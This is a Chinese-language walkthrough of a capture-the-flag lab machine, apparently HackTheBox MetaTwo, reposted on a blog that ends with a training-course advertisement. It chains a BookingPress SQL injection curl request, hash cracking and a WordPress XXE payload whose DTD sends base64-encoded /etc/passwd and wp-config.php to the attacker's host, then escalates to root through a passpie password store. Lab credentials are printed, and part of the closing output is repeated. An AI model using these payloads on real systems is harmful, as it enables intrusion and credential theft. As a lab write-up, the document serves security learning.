一、常规nmap扫描
- 发现开放了21,22,80端口
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QuAttfYD-1691198306237)(https://image.3001.net/images/20230206/1675697661_63e11dfd51f76c3b2276e.png!small)]
二、80端口渗透
-
先访问其80端口对应的网站,发现为WordPress
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cw5vUSiM-1691198306240)(https://image.3001.net/images/20230206/1675697783_63e11e77d5ea28da96cf6.png!small)] -
直接使用WPScan扫描一下,但是并未发现有用的信息
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ssxzlp7t-1691198306242)(https://image.3001.net/images/20230206/1675697837_63e11eadc0113b2d661e4.png!small)] -
翻看网页源代码,发现其使用了bookingpress插件
-
通过搜索发现bookingpress存在sql注入漏洞
地址:https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357(CVE-2022-0739)sudo curl -i ‘http://metapress.htb/wp-admin/admin-ajax.php’ --data ‘action=bookingpress_front_get_category_services&_wpnonce=5a84303f70&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -’
-
可以加上命令-x http://127.0.0.1:8080与burp联动进行手工sql注入,也可以选择SQLmap,这里为了方便使用sqlmap自动注入
sqlmap -r surp.txt -p total_service
获取到该数据库内的用户名和密码,但是密码为加密需要破解
-
使用hashcat破解hash值,查询 P P P特征的hashcat代码为m
sudo hashcat -m 400 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
解出结果为: P P PB4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
-
利用得到的用户名密码尝试登陆ssh和ftp均失败,通过扫描网站目录发现其后台登录入口,使用manager:partylikearockstar登陆成功
三、WordPress框架xxe漏洞利用
通过搜索WordPress版本号,发现此版本存在XXE漏洞
地址:https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
-
web服务器搭建dtd利用文件
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" > -
生成payload.wav
echo -en ‘RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?>%remote;%init;%trick;]>\x00’ > payload.wav
-
利用PHP搭建一个临时web服务器
php -S 0.0.0.0:9999
-
上传payload.wav文件,成功后返回base64编码的/etc/passwd结果,利用kali自带base64解密
echo -n ‘cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo=’ | base64 -d > passwd
-
解密后找到一个名为jnelson的用户,查询密码复用发现无效果
cat passwd | grep /bin/bash
-
由于之前扫描中发现该网站有Nginx,就顺势读取一下Nginx默认配置文件,发现有默认站点
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/nginx/nginx.conf"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" >
-
访问默认站点根目录/etc/nginx/sites-enabled/default,并发现一个名为blog站点
┌──(root㉿kali)-[/home/kali/metatwo]
└─# echo -en ‘c2VydmVyIHsKCglsaXN0ZW4gODA7CglsaXN0ZW4gWzo6XTo4MDsKCglyb290IC92YXIvd3d3L21ldGFwcmVzcy5odGIvYmxvZzsKCglpbmRleCBpbmRleC5waHAgaW5kZXguaHRtbDsKCiAgICAgICAgaWYgKCRodHRwX2hvc3QgIT0gIm1ldGFwcmVzcy5odGIiKSB7CiAgICAgICAgICAgICAgICByZXdyaXRlIF4gaHR0cDovL21ldGFwcmVzcy5odGIvOwogICAgICAgIH0KCglsb2NhdGlvbiAvIHsKCQl0cnlfZmlsZXMgJHVyaSAkdXJpLyAvaW5kZXgucGhwPyRhcmdzOwoJfQogICAgCglsb2NhdGlvbiB+IFwucGhwJCB7CgkJaW5jbHVkZSBzbmlwcGV0cy9mYXN0Y2dpLXBocC5jb25mOwoJCWZhc3RjZ2lfcGFzcyB1bml4Oi92YXIvcnVuL3BocC9waHA4LjAtZnBtLnNvY2s7Cgl9CgoJbG9jYXRpb24gfiogXC4oanN8Y3NzfHBuZ3xqcGd8anBlZ3xnaWZ8aWNvfHN2ZykkIHsKCQlleHBpcmVzIG1heDsKCQlsb2dfbm90X2ZvdW5kIG9mZjsKCX0KCn0K’ | base64 -d
server {listen 80; listen [::]:80; root /var/www/metapress.htb/blog; index index.php index.html; if ($http_host != "metapress.htb") { rewrite ^ http://metapress.htb/; } location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/var/run/php/php8.0-fpm.sock; } location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ { expires max; log_not_found off; }}
-
继续访问blog站点的配置文件,成功获取到FTP用户名和密码metapress.htb:9NYS_ii@FyL_p5M2NvJ
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" >
返回的信息如下
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );
/** MySQL database username */
define( 'DB_USER', 'blog' );
/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
/**#@+
* Authentication Unique Keys and Salts.
* @since 2.6.0
*/
define( 'AUTH_KEY', '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY', 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );
/**
* WordPress Database Table prefix.
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
四、FTP渗透
-
利用刚刚获取到的用户名和密码登录到FTP,浏览根目录,发现有两个文件夹,blog文件夹为网站源码,经分析无可利用点;mailer文件夹有可利用点
-
访问mailer文件夹,发现一个名为send_emai.php文件,下载到本地查看
-
浏览send_email.php,发现另一组用户名密码jnelson:Cb4_JmWM8zUZWMu@Ys,具体信息如下
┌──(root㉿kali)-[/home/kali/metatwo]
<?php /* * This script will be used to send an email to all our users when ready for launch */ use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; require 'PHPMailer/src/Exception.php'; require 'PHPMailer/src/PHPMailer.php'; require 'PHPMailer/src/SMTP.php'; $mail = new PHPMailer(true); $mail->SMTPDebug = 3; $mail->isSMTP(); $mail->Host = "mail.metapress.htb"; $mail->SMTPAuth = true; $mail->Username = "jnelson@metapress.htb"; $mail->Password = "Cb4_JmWM8zUZWMu@Ys"; $mail->SMTPSecure = "tls"; $mail->Port = 587; $mail->From = "jnelson@metapress.htb"; $mail->FromName = "James Nelson"; $mail->addAddress("info@metapress.htb"); $mail->isHTML(true); $mail->Subject = "Startup"; $mail->Body = "We just started our new blog metapress.htb!"; try { $mail->send(); echo "Message has been sent successfully"; } catch (Exception $e) { echo "Mailer Error: " . $mail->ErrorInfo; }
└─# cat send_email.php
五、提权
-
利用刚才获得的用户名密码进行ssh连接,获取第一组flag
-
第二组flag需要获取root权限才能获取,这里进行提权操作,通过查看当前目录文件,发现.passpie,查询得知这是一个密码管理应用,并保存有root账户密码
-
这里的密码都为加密后的,经查利用.keys可以解出passpie的密码
-
将从.keys获取到的密钥中的私钥部分保存为rootpass.txt,利用gpg2john把rootpass.txt转换成rootpass.john
┌──(root㉿kali)-[/home/kali/metatwo]
└─# gpg2john rootpass.txt > rootpass.john -
利用john解密,解出passpie密码为blink182
┌──(root㉿kali)-[/home/kali/metatwo]
└─# john -w=/usr/share/wordlists/rockyou.txt rootpass.john
、
-
passpie导出明文密码,命令如下
jnelson@meta2:~$ touch pass
jnelson@meta2:~$ passpie export pass
jnelson@meta2:~$ cat pass
credentials:- comment: ‘’
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: !!python/unicode ‘p7qfAZt4_A1xo_0x’ - comment: ‘’
fullname: jnelson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode ‘Cb4_JmWM8zUZWMu@Ys’
handler: passpie
version: 1.0
成功得到root用户密码为p7qfAZt4_A1xo_0x
- comment: ‘’
-
切换root用户获取第二组flag
lson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode ‘Cb4_JmWM8zUZWMu@Ys’
handler: passpie
version: 1.0
成功得到root用户密码为p7qfAZt4_A1xo_0x
- 切换root用户获取第二组flag
[外链图片转存中…(img-hqwv2SnO-1691198306258)]
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
学习资源分享
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-epmd284H-1691198306262)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]
扫一扫
225
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
